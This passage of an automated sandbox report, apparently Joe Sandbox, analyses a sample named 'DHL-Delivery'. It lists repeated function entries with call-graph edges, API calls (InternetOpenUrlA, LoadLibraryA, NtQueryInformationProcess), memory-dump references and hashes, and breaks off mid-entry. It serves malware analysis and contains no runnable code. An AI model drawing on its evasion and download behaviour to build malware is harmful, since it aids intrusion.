InternetOpenA 92657->92658 92659 5658d1 92658->92659 92660 565d1c 92659->92660 92661 56ab16 3 API calls 92659->92661 92662 565979 92661->92662 92662->92660 92663 565a60 InternetOpenUrlA 92662->92663 92663->92660 92664 565a7f 92663->92664 92664->92660 92665 56ab16 3 API calls 92664->92665 92666 565c5d 92664->92666 92665->92664 92667 56ab16 3 API calls 92666->92667 92668 565c98 92667->92668 92669 56ab16 3 API calls 92668->92669 92670 565cdb 92669->92670 92674 1e1204e0 LdrInitializeThunk 92675 5653ab 92676 5653b5 CreateFileA 92675->92676

                        Executed Functions

                        Function 0056AB3F, Relevance: 3.3, APIs: 2, Instructions: 287librarynativeUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 749 56ab3f-56ab8c 752 56ab8d-56ac45 749->752 758 56ac4b-56ae07 call 569344 752->758 774 56ae09-56ae55 758->774 777 56ae57-56afc5 774->777 788 56afc7-56b016 777->788 791 56b018-56b12a 788->791 801 56b130-56b1a6 791->801 802 56b35c-56b389 791->802 801->802 808 56b1ac-56b1b2 801->808 806 56b38b 802->806 806->806 808->802 809 56b1b8-56b1dc 808->809 809->802 811 56b1e2-56b1e8 809->811 811->802 812 56b1ee-56b1f3 811->812 812->802 813 56b1f9-56b21e 812->813 813->802 815 56b224-56b25f 813->815 817 56b265-56b269 815->817 818 5683ac-5683e1 815->818 817->802 820 56b26f-56b27b 817->820 821 5683e7-568420 call 568b71 818->821 822 5684db-56851c LoadLibraryA call 56854d 818->822 820->802 823 56b281-56b2b0 820->823 833 568422-568449 call 568b71 821->833 834 568490-5684da call 56854d 821->834 823->802 829 56b2b6-56b2c3 823->829 829->818 832 56b2c9-56b30a NtQueryInformationProcess 829->832 832->818 838 56b310 832->838 833->834 844 56844b-56848e call 568b71 833->844 834->822 840 56b311-56b31d 838->840 840->840 843 56b31f-56b346 840->843 843->802 844->834
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 896f70a04c8111f74db821c52fab5d1e154c25d88d50ff43e956975f09deb84c
                        • Instruction ID: 0ddf83902a3c455f76821eb3cc2916cc6537d5395a6db1502cec8e90a83047fa
                        • Opcode Fuzzy Hash: 896f70a04c8111f74db821c52fab5d1e154c25d88d50ff43e956975f09deb84c
                        • Instruction Fuzzy Hash: 0C813161708206DDEF34196489A83FA3E96BF56765FF44E2BDC43D3290E72188C5AA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AB19, Relevance: 1.7, APIs: 1, Instructions: 232librarynativeUNIQUE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 850 56ab19-56ab8c 854 56ab8d-56ac45 850->854 860 56ac4b-56ae07 call 569344 854->860 876 56ae09-56ae55 860->876 879 56ae57-56afc5 876->879 890 56afc7-56b016 879->890 893 56b018-56b12a 890->893 903 56b130-56b1a6 893->903 904 56b35c-56b389 893->904 903->904 910 56b1ac-56b1b2 903->910 908 56b38b 904->908 908->908 910->904 911 56b1b8-56b1dc 910->911 911->904 913 56b1e2-56b1e8 911->913 913->904 914 56b1ee-56b1f3 913->914 914->904 915 56b1f9-56b21e 914->915 915->904 917 56b224-56b25f 915->917 919 56b265-56b269 917->919 920 5683ac-5683e1 917->920 919->904 922 56b26f-56b27b 919->922 923 5683e7-568420 call 568b71 920->923 924 5684db-56851c LoadLibraryA call 56854d 920->924 922->904 925 56b281-56b2b0 922->925 935 568422-568449 call 568b71 923->935 936 568490-5684da call 56854d 923->936 925->904 931 56b2b6-56b2c3 925->931 931->920 934 56b2c9-56b30a NtQueryInformationProcess 931->934 934->920 940 56b310 934->940 935->936 946 56844b-56848e call 568b71 935->946 936->924 942 56b311-56b31d 940->942 942->942 945 56b31f-56b346 942->945 945->904 946->936
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 3eb64fe21dfaf8b76e94c9f2915cc84b43d948cd63066a1ce9831e154702ed7c
                        • Instruction ID: 203dad6a4b0fad1bc979f387b97b77c6e388325f71e989560cccb93645c567de
                        • Opcode Fuzzy Hash: 3eb64fe21dfaf8b76e94c9f2915cc84b43d948cd63066a1ce9831e154702ed7c
                        • Instruction Fuzzy Hash: BC611521748202CEFF25586489A83F53E92BB56725FF44E5BCC53D3290D32688C6EE53
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AB45, Relevance: 1.7, APIs: 1, Instructions: 222librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 33fa997b4eaedfaeaf85df6154c1009582ec7c89f5ef5ea53e3d72fc886fd1c0
                        • Instruction ID: b5659ad08a3c02c9b05b22512ee5850cb4c6394010f3221b578d7bf9cd4dea49
                        • Opcode Fuzzy Hash: 33fa997b4eaedfaeaf85df6154c1009582ec7c89f5ef5ea53e3d72fc886fd1c0
                        • Instruction Fuzzy Hash: 63510421748202CEFF254864C9A83F53E96BB66325FF44E5ACC53D7690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AB8F, Relevance: 1.7, APIs: 1, Instructions: 210librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: cbab3948758985fc6100f52a14e0bf02b1c8c1f87ccd4b34b389c7c2939f1903
                        • Instruction ID: c211825dc949681975e9427405d90be130bee7b2647a5c723a8bb0ed58bef75e
                        • Opcode Fuzzy Hash: cbab3948758985fc6100f52a14e0bf02b1c8c1f87ccd4b34b389c7c2939f1903
                        • Instruction Fuzzy Hash: CA510221748202DEFF25582489A83FA3E52BB56325FF94E1BCC53D3690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ABB3, Relevance: 1.7, APIs: 1, Instructions: 202librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 307032cf83ac37437a58e4f1d7e67b0124bc1c1209b63b3e7e7a254ba8387013
                        • Instruction ID: e3d0457bd2bfe2ddb381f8bf937cd3e2b638098d4cf34212f535cea54fcdb324
                        • Opcode Fuzzy Hash: 307032cf83ac37437a58e4f1d7e67b0124bc1c1209b63b3e7e7a254ba8387013
                        • Instruction Fuzzy Hash: FF51F221708202DEFF25596489A83F93E56BB56325FF94E1BCC53D3690D32289C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ABDD, Relevance: 1.7, APIs: 1, Instructions: 198librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: b1607fdb6e14463424f667e8ad498bfda36d134281ee51dcaa9ef00926f392f2
                        • Instruction ID: 4c74bfae46ffbca09d90c8c5f00833d291fd0ceeea951fa5a28c84ee4f235c50
                        • Opcode Fuzzy Hash: b1607fdb6e14463424f667e8ad498bfda36d134281ee51dcaa9ef00926f392f2
                        • Instruction Fuzzy Hash: B051D021708206DEFF25595489A83FA3E96BB56325FF94E1BCC53D7690D32288C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ABFD, Relevance: 1.7, APIs: 1, Instructions: 198librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 33823adfeeef93589b3cb69c0f9fba759bb1a701aedd3780751b4b86a78e270a
                        • Instruction ID: 86c4700e693396ad627f1915a59a0fa176bec3a658d579f97a8c94c104405dd3
                        • Opcode Fuzzy Hash: 33823adfeeef93589b3cb69c0f9fba759bb1a701aedd3780751b4b86a78e270a
                        • Instruction Fuzzy Hash: 0951E221748202DEFF25595489A83FA3E56BB56725FE54E1BCC53D3690D32288C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AC20, Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 29b1de2919b8d6cc93aa37c3255af532ef7e0e6b1d8c5c18a1f160a5264f6e80
                        • Instruction ID: 0a7f72c52536e29ce2d348fd4c867cbfc3753be521066b8148c43e5ed6030559
                        • Opcode Fuzzy Hash: 29b1de2919b8d6cc93aa37c3255af532ef7e0e6b1d8c5c18a1f160a5264f6e80
                        • Instruction Fuzzy Hash: 5D51E121748202DEFF254964C9A83F93E56BB56321FE94E1BCC53D3690D32288C5EE43
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Function 0056ACD2, Relevance: 1.7, APIs: 1, Instructions: 197librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 0b9867b7c2af50e2d8ba6e327d3a633b01b95a75b120d67947f6d37e86498dad
                        • Instruction ID: 730df956de8665c5c49c316a2119dc34ee4b5dc33736ec8fbdec26f3c5a793d4
                        • Opcode Fuzzy Hash: 0b9867b7c2af50e2d8ba6e327d3a633b01b95a75b120d67947f6d37e86498dad
                        • Instruction Fuzzy Hash: B0514921749202CEFF255964C8983E93E52BB66720FE84E5BCC13C72A0D37289C5DE53
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AC4D, Relevance: 1.7, APIs: 1, Instructions: 191librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 865edabb9364f581e5915951b44b5d2f7d47f0cd152be1b672ee6286ff684274
                        • Instruction ID: 0fb0a14e1a907e781248ea791d3e6782316bbb691786dc961a4f67188c49b096
                        • Opcode Fuzzy Hash: 865edabb9364f581e5915951b44b5d2f7d47f0cd152be1b672ee6286ff684274
                        • Instruction Fuzzy Hash: C851E321748202DEFF255954C9A83F93E56BB56321FE94E5BCC53D3690D32289C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AC74, Relevance: 1.7, APIs: 1, Instructions: 190librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 6b1361e92a30c5b006144887ee9fd6e4d01c40c4998d76e50dcf8bad1349cc06
                        • Instruction ID: 32059dd535e05b3552b81ea1ae15e5dd33276707dfb919dde76fd59f88ea3d9f
                        • Opcode Fuzzy Hash: 6b1361e92a30c5b006144887ee9fd6e4d01c40c4998d76e50dcf8bad1349cc06
                        • Instruction Fuzzy Hash: B4510521748202DDFF255964C9A83F93E56BB56321FE94E1BCC53D3690D32289C5EE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ACA0, Relevance: 1.7, APIs: 1, Instructions: 184librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 5042268bd934bf64ec282b4b970db24867b769db0abf47448fab1b3e78c12390
                        • Instruction ID: ff0f1b7bddef909895cf131f7ebecdb95b1bba38f7edb784a92df9f007833857
                        • Opcode Fuzzy Hash: 5042268bd934bf64ec282b4b970db24867b769db0abf47448fab1b3e78c12390
                        • Instruction Fuzzy Hash: 0651D221748202DDFF255964C9A83FA3E56BB66725FE94E1BCC53D3690E32188C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ACB5, Relevance: 1.7, APIs: 1, Instructions: 182librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 172e1603a599af3b2ebae7b6a6ab1f4b7a1d2993e6de23f9f6f130c09e8ffdbc
                        • Instruction ID: 68138c43901d7c825ae80bae9cb1517128ce553a00c6e24ac10125674c37826e
                        • Opcode Fuzzy Hash: 172e1603a599af3b2ebae7b6a6ab1f4b7a1d2993e6de23f9f6f130c09e8ffdbc
                        • Instruction Fuzzy Hash: C351F221708202DDFF254910C9A83FA3E56BB66321FE94E1BCC53D3290D32289C5EE03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ADC1, Relevance: 1.7, APIs: 1, Instructions: 175librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d3f13fe32707233e91437013c5ecad6eda1526f39ff7fa4042b76ed83a512597
                        • Instruction ID: 3d7332bfe933f72705c61d6842d46c34e1602670f7475be206a009f6aa5d79d9
                        • Opcode Fuzzy Hash: d3f13fe32707233e91437013c5ecad6eda1526f39ff7fa4042b76ed83a512597
                        • Instruction Fuzzy Hash: 90513A21748212DDFF255964C9A83E63E52BB66730FE54E5BCC13C72A0D37289C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AE2E, Relevance: 1.7, APIs: 1, Instructions: 175librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 4293931881aac80274d1db611e855c65573b8ac06396e112104285d0408fba49
                        • Instruction ID: 555c26a5d46105961438dfe2945ca888a564796e8e983ddbaa556a2f8299aab1
                        • Opcode Fuzzy Hash: 4293931881aac80274d1db611e855c65573b8ac06396e112104285d0408fba49
                        • Instruction Fuzzy Hash: C8517821749252CEFF214924C8A83EA3E52FB26730FE44E5ACC12C72A0D37285C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AD35, Relevance: 1.7, APIs: 1, Instructions: 174librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: f471512631044738e25c17e7a83ab6c51636d207b5d4c2dadba64dd3ac7dac1c
                        • Instruction ID: 61c7462110d1bbd858dfa8964a9900d85c02d8b6f4229a274316fe6b95768399
                        • Opcode Fuzzy Hash: f471512631044738e25c17e7a83ab6c51636d207b5d4c2dadba64dd3ac7dac1c
                        • Instruction Fuzzy Hash: 0351F321748202DEFF255954C9A83EA3E56BB66321FE94E1BCC12D32A0D37289C5DE43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AD59, Relevance: 1.7, APIs: 1, Instructions: 172librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: feeef3502ee701629437e0e26bbd93e3cd12cdbe9ef7b0bf10d9fba7cbb424c1
                        • Instruction ID: 252d935cd13819728b821fc79f924a6e2084d2dd0b817deddb12202fd07f95e0
                        • Opcode Fuzzy Hash: feeef3502ee701629437e0e26bbd93e3cd12cdbe9ef7b0bf10d9fba7cbb424c1
                        • Instruction Fuzzy Hash: 4751F321748202DEFF255954C9A83EA3E56BB66321FE94E1ACC12C72A0D37288C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AD7A, Relevance: 1.7, APIs: 1, Instructions: 171librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 9e6734693a336e8a6cb0e30d52d99cf1bf2ac081b697f93934c5a98629f62a00
                        • Instruction ID: a63185457012b7a96f35eee9de83c60807f2bc8e03a28d6c394c363d18831a1e
                        • Opcode Fuzzy Hash: 9e6734693a336e8a6cb0e30d52d99cf1bf2ac081b697f93934c5a98629f62a00
                        • Instruction Fuzzy Hash: 8D511621748202DEFF354954C9A83E63E56BB66321FE94E5BCC13C7290D37289C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056ADA1, Relevance: 1.7, APIs: 1, Instructions: 167librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d1ec5c44020d91248e58434730e86753849682f5f6f22a73086bbfb33477e30a
                        • Instruction ID: f3bdcee1950c53f5881050939efd2cd096eef39a3e47bbbd39eeb630cba23845
                        • Opcode Fuzzy Hash: d1ec5c44020d91248e58434730e86753849682f5f6f22a73086bbfb33477e30a
                        • Instruction Fuzzy Hash: 6A411521748202DDFF355954C9A83E63E56BB66321FE94E1BCC12C72A0D37288C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AE0B, Relevance: 1.7, APIs: 1, Instructions: 160librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: f175ae3d3764bf957d1296341a9cbab56f89379ccf6f80faca515e5ed554e08b
                        • Instruction ID: 94715906cd35a746d0e46b621317a91702e3de3600ee837a5f4be6f5c142b9e0
                        • Opcode Fuzzy Hash: f175ae3d3764bf957d1296341a9cbab56f89379ccf6f80faca515e5ed554e08b
                        • Instruction Fuzzy Hash: A7411821748306DDFF254954C9A83E63E56BB66330FE94E1BCC12C72A0D37289C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AEA0, Relevance: 1.7, APIs: 1, Instructions: 159librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: b22bb97e6c349969b486c1b6e7d341fb77a3ae38c398a9046bb760f2e39dac92
                        • Instruction ID: 459012f96f5fe5ce7388d9965d308e2911ed12d615797fd486072b54f97a9f6a
                        • Opcode Fuzzy Hash: b22bb97e6c349969b486c1b6e7d341fb77a3ae38c398a9046bb760f2e39dac92
                        • Instruction Fuzzy Hash: C4413621749202DDFF244964C9A83E63E52BB66730FE94E5ACC12C72A0D37285C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AEE7, Relevance: 1.6, APIs: 1, Instructions: 150librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 67a71fca5c9f9eed458d6be77192faf56f0beff556f634e0858973e59d305925
                        • Instruction ID: b887e3255d2f6095f869c9f9c2f69c5e271685eff3657f829cfcc5b17d8b0e75
                        • Opcode Fuzzy Hash: 67a71fca5c9f9eed458d6be77192faf56f0beff556f634e0858973e59d305925
                        • Instruction Fuzzy Hash: B6415521749202DDFF245924C9A83EA3E92FF26734FE94E5ACC12C72A0D37685C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AF84, Relevance: 1.6, APIs: 1, Instructions: 142librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 9e9a272cbf5cc38dee104138aea498018269e68ec9ce8ff95d06d0561cb98e95
                        • Instruction ID: 817ab052640700c4dc7b73c1d2c3c78041fdf577838905d86d0bb56697a0c0dc
                        • Opcode Fuzzy Hash: 9e9a272cbf5cc38dee104138aea498018269e68ec9ce8ff95d06d0561cb98e95
                        • Instruction Fuzzy Hash: C2416721749212DDFF214924C9A83EA3E93BB27734FE54E5ACC12C72A1D37245C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AF38, Relevance: 1.6, APIs: 1, Instructions: 137librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 55b8fc93ef03187ae8282a9b1dcb7c244c9231ea7b461e08eb50a1aefee8542c
                        • Instruction ID: 5b081e4285e37e5e5a67544ea9e0500eb15a052ce86998cad2b7ee36148e6b19
                        • Opcode Fuzzy Hash: 55b8fc93ef03187ae8282a9b1dcb7c244c9231ea7b461e08eb50a1aefee8542c
